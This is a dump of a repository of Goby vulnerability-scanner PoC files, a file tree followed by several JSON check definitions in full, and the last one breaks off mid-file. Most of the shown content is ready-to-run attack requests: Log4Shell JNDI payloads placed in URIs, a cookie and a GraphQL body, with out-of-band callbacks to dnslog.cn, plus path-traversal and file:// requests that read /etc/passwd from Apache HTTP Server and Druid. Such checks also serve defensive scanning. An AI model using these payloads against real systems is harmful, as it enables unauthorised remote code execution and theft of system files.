├── ADSelfService_Plus_RCE_CVE_2021_40539.json ├── Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json ├── Apache_Airflow_Unauthorized.json ├── Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json ├── Apache_Druid_Log4shell_CVE_2021_44228.json ├── Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json ├── Apache_HTTP_Server_SSRF_CVE_2021_40438.json ├── Apache_JSPWiki_Log4shell_CVE_2021_44228_1.json ├── Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json ├── Apache_OFBiz_Log4shell_CVE_2021_44228.json ├── Apache_SkyWalking_Log4shell_CVE_2021_44228.json ├── Aspcms_Backend_Leak.json ├── Cacti_Weathermap_File_Write.json ├── Citrix_Unauthorized_CVE_2020_8193.json ├── ClickHouse_SQLI.json ├── Coldfusion_LFI_CVE_2010_2861.json ├── Confluence_RCE_CVE_2021_26084.json ├── Consul_Rexec_RCE.json ├── Couch_CMS_Infoleak_CVE_2018_7662.json ├── Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json ├── Couchdb_Unauth.json ├── CraftCMS_Seomatic_RCE_CVE_2020_9597.json ├── Datang_AC_Default_Password.json ├── DedeCMS_Carbuyaction_FileInclude.json ├── DedeCMS_InfoLeak_CVE_2018_6910.json ├── Discuz_ML_3.x_RCE__CNVD_2019_22239.json ├── Discuz_RCE_WOOYUN_2010_080723.json ├── Discuz_Wechat_Plugins_Unauth.json ├── Discuz_v72_SQLI.json ├── Dlink_850L_Info_Leak.json ├── Dlink_Info_Leak_CVE_2019_17506.json ├── Dlink_RCE_CVE_2019_16920.json ├── Docker_Registry_API_Unauth.json ├── Dubbo_Admin_Default_Password.json ├── Fastmeeting_Arbitrary_File_Read.json ├── FineReport_v9_Arbitrary_File_Overwrite.json ├── Gitlab_RCE_CVE_2021_22205.json ├── Grafana_Plugins_Arbitrary_File_Read.json ├── Hikvision_RCE_CVE_2021_36260.json ├── Jellyfin_SSRF_CVE_2021_29490.json ├── Konga_Default_JWT_KEY.json ├── Metabase_Geojson_Arbitrary_File_Read_CVE_2021_41277.json ├── MobileIron_Log4shell_CVE_2021_44228.json ├── Node_RED_ui_base_Arbitrary_File_Read.json ├── README.md ├── Security_Devices_Hardcoded_Password.json ├── SonarQube_unauth_CVE_2020_27986.json ├── Struts2_Log4Shell_CVE_2021_44228_1.json ├── Struts2_Log4Shell_CVE_2021_44228_2.json ├── Struts2_Log4Shell_CVE_2021_44228_3.json ├── UniFi_Network_Log4shell_CVE_2021_44228.json ├── VENGD_Arbitrary_File_Upload.json ├── VMWare_Horizon_Log4shell_CVE_2021_44228.json ├── VMware_NSX_Log4shell_CVE_2021_44228.json ├── VMware_vCenter_Log4shell_CVE_2021_44228_1.json ├── VMware_vCenter_v7.0.2_Arbitrary_File_Read.json ├── Weaver_EOffice_Arbitrary_File_Upload_CNVD_2021_49104.json ├── YAPI_RCE.json └── alibaba_canal_default_password.json /ADSelfService_Plus_RCE_CVE_2021_40539.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ADSelfService Plus RCE CVE-2021-40539", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce", 6 | "unauth" 7 | ], 8 | "GobyQuery": "(title=\"ManageEngine - ADSelfService Plus\" | app=\"ZOHO-ManageEngine-ADSelfService\" | title==\"ADSelfService Plus\" | body=\"ADSelfService Plus\")", 9 | "Description": "Zoho ManageEngine ADSelfService Plus 6113版本及更早版本存在授权问题漏洞,该漏洞源于软件很容易绕过REST API认证,从而导致远程代码执行", 10 | "Product": "ADSelfService Plus", 11 | "Homepage": "https://www.manageengine.cn/products/self-service-password/pricing-details.html", 12 | "Author": "aetkrad", 13 | "Impact": "", 14 | "Recommendation": "", 15 | "References": [ 16 | "https://forum.butian.net/share/876" 17 | ], 18 | "HasExp": false, 19 | "ExpParams": null, 20 | "ExpTips": { 21 | "Type": "", 22 | "Content": "" 23 | }, 24 | "ScanSteps": [ 25 | "AND", 26 | { 27 | "Request": { 28 | "method": "POST", 29 | "uri": "/./RestAPI/LogonCustomization", 30 | "follow_redirect": false, 31 | "header": { 32 | "Content-Type": "application/x-www-form-urlencoded" 33 | }, 34 | "data_type": "text", 35 | "data": "methodToCall=previewMobLogo", 36 | "set_variable": [] 37 | }, 38 | "ResponseTest": { 39 | "type": "group", 40 | "operation": "AND", 41 | "checks": [ 42 | { 43 | "type": "item", 44 | "variable": "$code", 45 | "operation": "==", 46 | "value": "200", 47 | "bz": "" 48 | }, 49 | { 50 | "type": "item", 51 | "variable": "$body", 52 | "operation": "contains", 53 | "value": "var d = new Date();", 54 | "bz": "" 55 | }, 56 | { 57 | "type": "item", 58 | "variable": "$body", 59 | "operation": "contains", 60 | "value": "window.parent.$(\"#tabLogo\")", 61 | "bz": "" 62 | } 63 | ] 64 | }, 65 | "SetVariable": [ 66 | "output|lastbody|regex|" 67 | ] 68 | } 69 | ], 70 | "PostTime": "2021-11-30 20:01:22", 71 | "GobyVersion": "1.9.310" 72 | } -------------------------------------------------------------------------------- /Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache APISIX Dashboard RCE CVE-2021-45232", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "title==\"Apache APISIX Dashboard\"", 8 | "Description": "Apache APISIX Dashboard migrate接口存在未授权访问漏洞,可下载路由配置文件以及上传配置文件,导致存在命令执行。", 9 | "Product": "Apache APISIX Dashboard", 10 | "Homepage": "https://apisix.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247487772&idx=2&sn=09b6c93b14f10f4cb41aecc94ce71c75" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/apisix/admin/migrate/export", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "Consumers\":[],\"Routes\":", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "PluginConfigs\":", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "ExploitSteps": [ 68 | "AND", 69 | { 70 | "Request": { 71 | "method": "GET", 72 | "uri": "/apisix/admin/migrate/export", 73 | "follow_redirect": false, 74 | "header": null, 75 | "data_type": "text", 76 | "data": "", 77 | "set_variable": [] 78 | }, 79 | "ResponseTest": { 80 | "type": "group", 81 | "operation": "AND", 82 | "checks": [ 83 | { 84 | "type": "item", 85 | "variable": "$code", 86 | "operation": "==", 87 | "value": "200", 88 | "bz": "" 89 | }, 90 | { 91 | "type": "item", 92 | "variable": "$body", 93 | "operation": "contains", 94 | "value": "Consumers\":[],\"Routes\":", 95 | "bz": "" 96 | }, 97 | { 98 | "type": "item", 99 | "variable": "$body", 100 | "operation": "contains", 101 | "value": "PluginConfigs\":", 102 | "bz": "" 103 | } 104 | ] 105 | }, 106 | "SetVariable": [ 107 | "output|lastbody|regex|" 108 | ] 109 | } 110 | ], 111 | "PostTime": "2021-12-30 17:02:19", 112 | "GobyVersion": "1.9.320" 113 | } -------------------------------------------------------------------------------- /Apache_Airflow_Unauthorized.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Airflow Unauthorized", 3 | "Level": "3", 4 | "Tags": [ 5 | "Unauthorized" 6 | ], 7 | "GobyQuery": "app=\"APACHE-Airflow\"", 8 | "Description": "remote attacker to gain unauthorized access to a targeted system", 9 | "Product": "APACHE-Airflow", 10 | "Homepage": "https://airflow.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/admin/", 27 | "follow_redirect": true, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "Airflow - DAGs", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | "operation": "contains", 55 | "value": "DAGs", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody|regex|" 62 | ] 63 | } 64 | ], 65 | "PostTime": "2021-10-31 15:32:53", 66 | "GobyVersion": "1.8.302" 67 | } -------------------------------------------------------------------------------- /Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Druid Abritrary File Read CVE-2021-36749", 3 | "Level": "3", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "title=\"Apache Druid\"", 8 | "Description": "In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.", 9 | "Product": "Druid", 10 | "Homepage": "https://druid.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/1iGsy2KpiijihtJ3M2Tdzw" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Path", 21 | "Type": "input", 22 | "Value": "/etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "POST", 34 | "uri": "/druid/indexer/v1/sampler?for=connect", 35 | "follow_redirect": false, 36 | "header": { 37 | "Accept": "application/json, text/plain, */*", 38 | "Content-Type": "application/json;charset=UTF-8" 39 | }, 40 | "data_type": "text", 41 | "data": "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}", 42 | "set_variable": [] 43 | }, 44 | "ResponseTest": { 45 | "type": "group", 46 | "operation": "AND", 47 | "checks": [ 48 | { 49 | "type": "item", 50 | "variable": "$code", 51 | "operation": "==", 52 | "value": "200", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "root:x:", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody||" 66 | ] 67 | } 68 | ], 69 | "ExploitSteps": [ 70 | "AND", 71 | { 72 | "Request": { 73 | "method": "POST", 74 | "uri": "/druid/indexer/v1/sampler?for=connect", 75 | "follow_redirect": false, 76 | "header": { 77 | "Accept": "application/json, text/plain, */*", 78 | "Content-Type": "application/json;charset=UTF-8" 79 | }, 80 | "data_type": "text", 81 | "data": "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file://{{{Path}}}\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}", 82 | "set_variable": [] 83 | }, 84 | "ResponseTest": { 85 | "type": "group", 86 | "operation": "AND", 87 | "checks": [ 88 | { 89 | "type": "item", 90 | "variable": "$code", 91 | "operation": "==", 92 | "value": "200", 93 | "bz": "" 94 | } 95 | ] 96 | }, 97 | "SetVariable": [ 98 | "output|lastbody||" 99 | ] 100 | } 101 | ], 102 | "PostTime": "2021-11-23 17:14:35", 103 | "GobyVersion": "1.8.302" 104 | } -------------------------------------------------------------------------------- /Apache_Druid_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Druid Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "title==\"Apache Druid\"", 8 | "Description": "Apache Druid存在log4j漏洞。", 9 | "Product": "Apache Druid", 10 | "Homepage": "https://druid.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "$%7bjndi:ldap:%2f%2fdnslog.cn%2ftea%7d" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "DELETE", 61 | "uri": "/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{{dnstest}}}%2ftea%7d", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [] 72 | }, 73 | "SetVariable": [ 74 | "output|lastbody|regex|" 75 | ] 76 | }, 77 | { 78 | "Request": { 79 | "method": "GET", 80 | "uri": "http://www.dnslog.cn/getrecords.php", 81 | "follow_redirect": false, 82 | "header": null, 83 | "data_type": "text", 84 | "data": "", 85 | "set_variable": [] 86 | }, 87 | "ResponseTest": { 88 | "type": "group", 89 | "operation": "AND", 90 | "checks": [ 91 | { 92 | "type": "item", 93 | "variable": "$code", 94 | "operation": "==", 95 | "value": "200", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "{{{dnstest}}}", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "ExploitSteps": [ 113 | "AND", 114 | { 115 | "Request": { 116 | "method": "DELETE", 117 | "uri": "/druid/coordinator/v1/lookups/config/{{{cmd}}}", 118 | "follow_redirect": false, 119 | "header": null, 120 | "data_type": "text", 121 | "data": "", 122 | "set_variable": [] 123 | }, 124 | "ResponseTest": { 125 | "type": "group", 126 | "operation": "AND", 127 | "checks": [] 128 | }, 129 | "SetVariable": [ 130 | "output|lastbody|regex|" 131 | ] 132 | } 133 | ], 134 | "PostTime": "2021-12-30 11:00:21", 135 | "GobyVersion": "1.9.320" 136 | } -------------------------------------------------------------------------------- /Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache HTTP Server Arbitrary File Read(CVE-2021-41773)", 3 | "Level": "2", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "(server=\"Apache/2.4.49\"||product=\"Apache-Web-Server\"||server=\"Apache\")", 8 | "Description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.", 9 | "Product": "Apache HTTP Server", 10 | "Homepage": "http://httpd.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

read arbitrary files

", 13 | "Recommendation": "", 14 | "References": [ 15 | "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Filepath", 21 | "Type": "input", 22 | "Value": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "root:x:0:0:root:", 57 | "bz": "" 58 | } 59 | ] 60 | }, 61 | "SetVariable": [ 62 | "output|lastbody||" 63 | ] 64 | } 65 | ], 66 | "ExploitSteps": [ 67 | "AND", 68 | { 69 | "Request": { 70 | "method": "GET", 71 | "uri": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", 72 | "follow_redirect": false, 73 | "header": null, 74 | "data_type": "text", 75 | "data": "", 76 | "set_variable": [] 77 | }, 78 | "ResponseTest": { 79 | "type": "group", 80 | "operation": "AND", 81 | "checks": [ 82 | { 83 | "type": "item", 84 | "variable": "$code", 85 | "operation": "==", 86 | "value": "200", 87 | "bz": "" 88 | }, 89 | { 90 | "type": "item", 91 | "variable": "$body", 92 | "operation": "contains", 93 | "value": "root:x:0:0:root:", 94 | "bz": "" 95 | } 96 | ] 97 | }, 98 | "SetVariable": [ 99 | "output|lastbody||" 100 | ] 101 | } 102 | ], 103 | "PostTime": "2021-10-28 10:10:27", 104 | "GobyVersion": "1.8.302" 105 | } -------------------------------------------------------------------------------- /Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache JSPWiki Log4shell CVE-2021-44228 (2)", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(body=\"
JSPWiki\" | title=\"JSPWiki\")", 8 | "Description": "Apache JSPWiki /wiki存在log4j漏洞。", 9 | "Product": "JSPWiki", 10 | "Homepage": "https://jspwiki.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s?__biz=MzA5OTA0MTU4Mg==&mid=2247485581&idx=1&sn=033cafb1442d44e6cfc85796e42f206d" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "$%7Bjndi:ldap:$%7B::-/%7D/xxxdnslog.cn/tea%7D" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/wiki/$%7Bjndi:ldap:$%7B::-/%7D/{{{dnstest}}}/tea%7D", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [ 72 | { 73 | "type": "item", 74 | "variable": "$code", 75 | "operation": "==", 76 | "value": "200", 77 | "bz": "" 78 | } 79 | ] 80 | }, 81 | "SetVariable": [ 82 | "output|lastbody|regex|" 83 | ] 84 | }, 85 | { 86 | "Request": { 87 | "method": "GET", 88 | "uri": "http://www.dnslog.cn/getrecords.php", 89 | "follow_redirect": false, 90 | "header": null, 91 | "data_type": "text", 92 | "data": "", 93 | "set_variable": [] 94 | }, 95 | "ResponseTest": { 96 | "type": "group", 97 | "operation": "AND", 98 | "checks": [ 99 | { 100 | "type": "item", 101 | "variable": "$code", 102 | "operation": "==", 103 | "value": "200", 104 | "bz": "" 105 | }, 106 | { 107 | "type": "item", 108 | "variable": "$body", 109 | "operation": "contains", 110 | "value": "{{{dnstest}}}", 111 | "bz": "" 112 | } 113 | ] 114 | }, 115 | "SetVariable": [ 116 | "output|lastbody|regex|" 117 | ] 118 | } 119 | ], 120 | "ExploitSteps": [ 121 | "AND", 122 | { 123 | "Request": { 124 | "method": "POST", 125 | "uri": "/wiki/{{{cmd}}}", 126 | "follow_redirect": false, 127 | "header": null, 128 | "data_type": "text", 129 | "data": "", 130 | "set_variable": [] 131 | }, 132 | "ResponseTest": { 133 | "type": "group", 134 | "operation": "AND", 135 | "checks": [ 136 | { 137 | "type": "item", 138 | "variable": "$code", 139 | "operation": "==", 140 | "value": "200", 141 | "bz": "" 142 | } 143 | ] 144 | }, 145 | "SetVariable": [ 146 | "output|lastbody|regex|" 147 | ] 148 | } 149 | ], 150 | "PostTime": "2021-12-27 15:00:47", 151 | "GobyVersion": "1.9.310" 152 | } -------------------------------------------------------------------------------- /Apache_OFBiz_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache OFBiz Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(port=\"8443\" | protocol=\"https\")", 8 | "Description": "Apache OFBiz 存在log4j漏洞。", 9 | "Product": "Apache OFBiz", 10 | "Homepage": "https://ofbiz.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:ldap://{{{dnstest}}}/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "GET", 61 | "uri": "/webtools/control/main", 62 | "follow_redirect": false, 63 | "header": { 64 | "Cookie": "OFBiz.Visitor=${jndi:ldap://{{{dnstest}}}/tea}" 65 | }, 66 | "data_type": "text", 67 | "data": "", 68 | "set_variable": [] 69 | }, 70 | "ResponseTest": { 71 | "type": "group", 72 | "operation": "AND", 73 | "checks": [] 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody|regex|" 77 | ] 78 | }, 79 | { 80 | "Request": { 81 | "method": "GET", 82 | "uri": "http://www.dnslog.cn/getrecords.php", 83 | "follow_redirect": false, 84 | "header": null, 85 | "data_type": "text", 86 | "data": "", 87 | "set_variable": [] 88 | }, 89 | "ResponseTest": { 90 | "type": "group", 91 | "operation": "AND", 92 | "checks": [ 93 | { 94 | "type": "item", 95 | "variable": "$code", 96 | "operation": "contains", 97 | "value": "200", 98 | "bz": "" 99 | }, 100 | { 101 | "type": "item", 102 | "variable": "$body", 103 | "operation": "contains", 104 | "value": "{{{dnstest}}}", 105 | "bz": "" 106 | } 107 | ] 108 | }, 109 | "SetVariable": [ 110 | "output|lastbody|regex|" 111 | ] 112 | } 113 | ], 114 | "ExploitSteps": [ 115 | "AND", 116 | { 117 | "Request": { 118 | "method": "GET", 119 | "uri": "/webtools/control/main", 120 | "follow_redirect": false, 121 | "header": { 122 | "Cookie": "OFBiz.Visitor={{{cmd}}}" 123 | }, 124 | "data_type": "text", 125 | "data": "", 126 | "set_variable": [] 127 | }, 128 | "ResponseTest": { 129 | "type": "group", 130 | "operation": "AND", 131 | "checks": [] 132 | }, 133 | "SetVariable": [ 134 | "output|lastbody|regex|" 135 | ] 136 | } 137 | ], 138 | "PostTime": "2022-01-05 13:28:40", 139 | "GobyVersion": "1.9.320" 140 | } -------------------------------------------------------------------------------- /Apache_SkyWalking_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache SkyWalking Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "( app=\"SkyWalking\" | title=\"Skywalking\" )", 8 | "Description": "Apache SkyWalking 存在Log4j漏洞。", 9 | "Product": "Apache SkyWalking", 10 | "Homepage": "https://skywalking.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://gobies.org/" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:dns://dnslog.cn/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/graphql", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "{\"query\":\"${jndi:dns://{{{dnstest}}}/tea}\",\"variables\":{\"duration\":{\"start\":\"2021-12-22 1259\",\"end\":\"2021-12-22 1314\",\"step\":\"MINUTE\"}}}", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [] 72 | }, 73 | "SetVariable": [ 74 | "output|lastbody|regex|" 75 | ] 76 | }, 77 | { 78 | "Request": { 79 | "method": "GET", 80 | "uri": "http://www.dnslog.cn/getrecords.php", 81 | "follow_redirect": false, 82 | "header": null, 83 | "data_type": "text", 84 | "data": "", 85 | "set_variable": [] 86 | }, 87 | "ResponseTest": { 88 | "type": "group", 89 | "operation": "AND", 90 | "checks": [ 91 | { 92 | "type": "item", 93 | "variable": "$code", 94 | "operation": "==", 95 | "value": "200", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "{{{dnstest}}}", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 